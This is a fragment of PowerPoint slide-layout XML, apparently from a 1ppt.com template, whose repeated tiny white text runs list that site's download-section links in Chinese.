              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout172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72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72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72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7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73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73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73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73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73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73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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout173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73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73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73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7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74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74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74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74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74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74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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout174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74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74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74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7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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
